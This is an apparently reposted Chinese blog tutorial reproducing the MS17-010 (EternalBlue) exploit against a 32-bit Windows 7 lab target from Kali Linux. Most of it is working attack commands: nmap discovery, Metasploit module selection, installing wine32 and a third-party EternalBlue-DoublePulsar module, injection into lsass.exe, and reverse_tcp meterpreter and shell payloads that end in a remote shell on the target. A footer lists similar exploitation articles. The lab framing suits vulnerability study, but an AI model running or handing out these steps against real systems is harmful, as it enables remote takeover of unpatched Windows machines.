MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

这篇具有很好参考价值的文章主要介绍了MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

漏洞复现:MS17-010

漏洞利用的条件:1.靶机开启445端口(如果未打开该端口将会攻击失败,百度打开445端口)

                             2.关闭防火墙

靶机:windows 7(未知X32位还是X64位) ip:192.168.1.9

攻击机:kali linux (X64) ip:192.168.1.101

使用工具:meatsploit,nmap

前期准备工作:由于kali是64位,如果windows 7 是32 位,所以我们得安装wine32环境,并且下载32位操作系统的永恒之蓝漏洞利用脚本。可参考文章后面大佬的博客,也可阅读本文。如果是X64位操作系统则不用安装。

第一部分:主机发现(nmap)

打开nmap进行主机发现,可以扫描到主机的IP地址,端口号,服务器的版本等其他信息

Nmap -A 192.168.1.0/24

MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位发现靶机开放445端口,那么我们就可以利用该端口进行渗透

第二部分:metasploit工具进行漏洞利用

1.启动该工具

msfconsole

MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

2. 查找永恒之蓝漏洞利用脚本

search ms17-010

MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

可以看到有这样几种攻击脚本 (第四个脚本文章会详细说明如何安装),exploit开头的是漏洞利用模块,可以用来进行攻击;auxiliary是漏洞辅助模块,可以查询漏洞的详细信息等。

3.我们先用auxiliary是漏洞辅助模块,查询漏洞的详细信息,如下图所示

use 3   #使用该模块

show options   #显示需要设置的参数

set rhosts 192.168.1.9   #设置靶机的IP地址

MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

 4.查看漏洞利用payload

show payloads

MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

 5.设置攻击用到的payloads

set payloads windows/x64/meterpreter/reverse_tcp  #设置payloads

run  #开始进行漏洞利用攻击(输入exploit也可以反弹出交互式shell)

MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

 可以看到提示信息,该主机可能存在这个漏洞

6.接下来我们使用exploit模块(步骤同上,原理同上)------如果未知靶机是多少位的操作系统,我们先用常规的用来测试X64位操作系统

search ms17-010   #查询漏洞利用脚本

use 0   

set payloads windows/x64/meterpreter/reverse_tcp

show options

MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

 

set rhosts 192.168.1.9   #靶机的IP地址

run 

MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

 本次运行的结果如下,可以看到攻击失败,同时给与提示,该模块只能攻击X64位操作系统,说明我们的靶机是X32位

MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

 7.确定靶机是X32位操作系统,安装wine 32环境,安装攻击32位操作系统所用的的脚本

安装wine 32 位环境:

方法一:

apt-get install wine32

MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

 

在执行exploit时可能会出现 :

it looks like wine32 is missing, you should install it.

multiarch needs to be enabled first. as root, please

execute "dpkg --add-architecture i386 && apt-get update && apt-get install wine32"

按照上面的方法dpkg --add-architecture i386 && apt-get update && apt-get install wine32即可

apt-get install wine32

dpkg --add-architecture i386 && apt-get update && apt-get install wine32

MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

 验证是否安装成功

wine --version


wine cmd.exe

MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

用wine32执行cmd.exe

wine cmd.exe

 MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

 如上图所示,即wine 32 安装成功

方法二:(仅供参考)

使用终端输入下列命令

dpkg --add-architecture i386    #这是让Linux安装32位架构,好兼容32位的程序

执行完毕之后再次执行

apt-get update && apt-get install wine32


apt-get install wine32


dpkg --add-architecture i386 && apt-get update &&      
                 

cmdand cmdand> cmd.exe   #输入cmd.exe

dpkg --add-architecture i386 && apt-get update && apt-get install wine32

注意事项

64位Linux一般会自带一个Wine,名字是wine64,注意Wine32安装之后的名字是wine而非wine32。(可能有些系统会不同但几率不大)

附上卸载i386的方法

dpkg --remove-architecture i386

可能缺少多架构支持,所以我们安装多架构支持,所以安装win 32

安装攻击32位操作系统所用的的脚本

首先下载利用的脚本:

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

下载下来之后要记得解压

MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

然后将脚本拷贝到  /usr/share/metasploit-framework/modules/exploits/windows/smb

cd Eternalblue-Doublepulsar-Metasploit/

cp -r deps/ eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb

MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

 如上图所示,脚本下载并复制到SMB目录下成功

8.接下来我们使用exploit模块(步骤同上,原理同上)------已知靶机是32位的操作系统,我们用常32位的脚本来入侵操作系统

msfconsole

search eternalblue  #或者search ms17-010

MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

 MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

use exploit/windows/smb/eternalblue_doublepulsar

set DOUBLEPULSARPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps

set ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps

set PROCESSINJECT lsass.exe

set TARGETARCHITECTURE x64

set rhost 192.168.1.9

MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

show options   #查看设置的参数

MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

设置payloads,特别注意和之前的payloads不同(去掉中间的X86,否则会失败)

set payload windows/meterpreter/reverse_tcp


exploit  #或者run   开始攻击,反弹shell

拓展:

第一种交互式shellpayload设置方法:set payload windows/meterpreter/reverse_tcp  (注意:此处的payload里面去掉X86,不然链接不成功)

第二种反弹式shellpayload设置方法:set payload windows/shell/reverse_tcp  (注意:此处的payload里面去掉X86,不然链接不成功)

MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

如下图所示,攻击成功,反弹出shell ,可移执行windows 7 的系统命令MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

 查看到靶机的IP地址,还可以执行更多的命令..........

Meterpreter命令详解 - yokan - 博客园 (cnblogs.com)https://www.cnblogs.com/vege/p/12635066.html#:~:text=meterpreter%E7%9A%84%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4%E7%94%A8%E4%BA%8E%E6%9F%A5%E7%9C%8B%E7%9B%AE%E6%A0%87%E7%B3%BB%E7%BB%9F%E7%9A%84%E4%B8%80%E4%BA%9B%E4%BF%A1%E6%81%AF%E3%80%81%E5%AF%B9%E7%B3%BB%E7%BB%9F%E8%BF%9B%E8%A1%8C%E5%9F%BA%E6%9C%AC%E7%9A%84%E6%93%8D%E4%BD%9C%E7%AD%89%E3%80%82%20migrate,%EF%BC%9A%E4%BD%BF%E7%94%A8migrate%E5%91%BD%E4%BB%A4%E5%8F%AF%E4%BB%A5%E5%B0%86meterpreter%E4%BC%9A%E8%AF%9D%E4%BB%8E%E4%B8%80%E4%B8%AA%E8%BF%9B%E7%A8%8B%E7%A7%BB%E6%A4%8D%E5%88%B0%E5%8F%A6%E4%B8%80%E4%B8%AA%E8%BF%9B%E7%A8%8B%E7%9A%84%E5%86%85%E5%AD%98%E7%A9%BA%E9%97%B4%E4%B8%AD%EF%BC%8C%E8%BF%99%E4%B8%AA%E5%91%BD%E4%BB%A4%E5%9C%A8%E6%B8%97%E9%80%8F%E6%94%BB%E5%87%BB%E6%A8%A1%E5%9D%97%E4%B8%AD%E7%BB%8F%E5%B8%B8%E4%BD%BF%E7%94%A8%E3%80%82%20%E8%AF%95%E6%83%B3%E4%B8%80%E4%B8%8B%EF%BC%8C%E5%A6%82%E6%9E%9C%E6%98%AF%E5%88%A9%E7%94%A8IE%E6%B5%8F%E8%A7%88%E5%99%A8%E6%BC%8F%E6%B4%9E%E8%BF%9B%E8%A1%8C%E6%BA%A2%E5%87%BA%E5%BE%97%E5%88%B0%E7%9A%84meterpreter%E4%BC%9A%E8%AF%9D%EF%BC%8Cmeterpreter%E4%BB%A3%E7%A0%81%E5%AD%98%E5%9C%A8%E4%BA%8EIE%E7%9A%84%E5%86%85%E5%AD%98%E7%A9%BA%E9%97%B4%E4%B8%AD%EF%BC%8C%E5%A6%82%E6%9E%9C%E7%94%A8%E6%88%B7%E5%85%B3%E9%97%AD%E6%B5%8F%E8%A7%88%E5%99%A8%EF%BC%8C%E5%B0%86%E4%BC%9A%E7%BB%88%E6%AD%A2%E4%BC%9A%E8%AF%9D%E8%BF%9E%E6%8E%A5%E3%80%82

MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

 参考文章:(112条消息) 利用MS17-010渗透win7(32位)_1stPeak's Blog-CSDN博客_msf永恒之蓝32位https://blog.csdn.net/qq_41617034/article/details/91051614

 (112条消息) kali linux安装wine32,永恒之蓝msf下 ms17_010 (64位kali下安装wine32)_我是公务员的博客-CSDN博客https://blog.csdn.net/weixin_35458961/article/details/116933855文章来源地址https://www.toymoban.com/news/detail-474145.html

到了这里,关于MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【网络安全】MS17-010“永恒之蓝”漏洞的利用

    导语 最近学期末进行网络安全实训,老师要求每个小组选择一个方向进行研究,本篇将讲述“永恒之蓝”漏洞的简单利用。 一、实验原理 Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,电脑只要开机,攻

    2024年02月07日
    浏览(31)
  • 利用kali Linux复现永恒之蓝(MS17-010)漏洞

    目录 什么是永恒之蓝? 永恒之蓝漏洞原理 实验环境 操作前提 实验步骤 (1)复现成功后,执行截图命令 (2)对受害机器建立用户,并且开启受害机器的远程桌面并连接 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒

    2024年02月12日
    浏览(26)
  • 浅析ms17_010(永恒之蓝)漏洞利用过程及防护措施

    一、永恒之蓝(Wannacry)漏洞简介 1)一种“蠕虫式”的勒索病毒软件,利用windows的SMB漏洞传播,可以获取System最高权限; 2)主要对windows服务器、主机有较大影响;黑客利用病毒对电脑重要文件进行加密,索要高比特币,是一种常见的 “勒索病毒” ; 3)中国部分Windows操作系统

    2024年02月13日
    浏览(23)
  • 漏洞复现-永恒之蓝(MS17-010)

    目录 一,漏洞介绍 1,永恒之蓝是什么? 2,漏洞原理 3,影响版本 二,实验环境 三,漏洞复现 四,利用exploit模块进行渗透          永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”

    2024年02月13日
    浏览(51)
  • ms17-010(永恒之蓝)漏洞复现

    目录 前言 一、了解渗透测试流程  二、使用nmap工具对win7进行扫描 三、尝试ms17-010漏洞利用 四、结果展示 总结 🌈嗨!我是Filotimo__🌈。很高兴与大家相识,希望我的博客能对你有所帮助。 💡本文由Filotimo__✍️原创,首发于CSDN📚。 📣如需转载,请事先与我联系以获得授

    2024年02月09日
    浏览(25)
  • 永恒之蓝(MS17-010)漏洞复现

    目录 漏洞简介 漏洞描述 影响版本 复现环境 攻击机 IP:192.168.109.132 靶机 IP:192.168.109.130 开启远程设置 卸载全部安全补丁 复现过程 一、主机发现 二、打开metasploit工具 三、使用msf搜寻MS17-010漏洞 四、使用MS17-010扫描模块,对靶机进行扫描 1.使用扫描模块 2.查看模块需要配置

    2024年02月13日
    浏览(35)
  • 永恒之蓝漏洞复现(ms17-010)

    永恒之蓝漏洞复现(ms17-010) 环境 信息收集 先扫描目标靶机IP 进入MSF查看是否存在永恒之蓝的漏洞 攻击 攻击机:kali 靶机:Windows Server 2008 对ip进行收集开放什么端口 先扫描目标靶机IP 因为在同一个内网之中 所以可以使用arp-scan -l 进行查询 知道目标靶机IP(192.168.162.146)来进

    2024年03月25日
    浏览(44)
  • 【ms17-010】永恒之蓝漏洞复现

    准备工作 攻击机:kali,ip:192.168.56.128 靶机:windows server 2003,ip:192.168.56.132 工具:nmap(扫描)、msf 漏洞利用 首先我们先在攻击机上使用nmap扫一下该网段主机的存活情况 此时已经扫描出来了,ip为: 192.168.56.132 的主机开启,并且显示了开放的端口号。 然后我们可以使用:

    2024年01月19日
    浏览(31)
  • 永恒之蓝ms17_010漏洞复现

    攻击机:Linux kali(IP:192.168.52.132) 靶机:Windows 7(x64)(IP:192.168.52.130) 条件:靶机防火墙关闭,两台机子能够相互ping通,靶机445端口开启(永恒之蓝漏洞就是通过恶意代码扫描并攻击开放445端口的 Windows 主机)   登录 kali linux,用 nmap 探测本网段存活主机 nmap 192.168.5

    2024年02月11日
    浏览(27)
  • ms17-010(永恒之蓝) 漏洞复现与处理

    ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入

    2024年02月09日
    浏览(32)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包